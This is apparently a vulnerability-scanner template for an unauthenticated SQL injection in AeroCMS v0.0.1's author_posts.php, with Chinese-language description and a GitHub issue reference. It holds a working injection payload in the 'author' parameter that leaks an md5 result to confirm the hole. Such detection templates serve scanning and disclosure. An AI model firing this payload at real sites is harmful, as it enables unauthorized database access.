id: aero-cms-frontend-sql-injection

info:
  name: AeroCMS v0.0.1 前端sql注入漏洞
  author: daffainfo
  severity: high
  verified: false
  description: AeroCMS v0.0.1 被发现通过 \author_posts.php 中的“author”参数包含 SQL 注入漏洞。该漏洞使攻击者无需身份验证即可获得数据库管理员权限并访问数据库信息。
  reference:
    - https://github.com/MegaTKC/AeroCMS/issues/6

set:
  s1: randomInt(100000, 200000)
rules:
  r0:
    request:
      method: GET
      path: /author_posts.php?author=admin' AND (SELECT 9591 FROM (SELECT(md5({{s1}})))ONHE)-- jqaW&p_id=1
    expression: response.body.bcontains(bytes(substr(md5(string(s1)), 2, 28)))
expression: r0()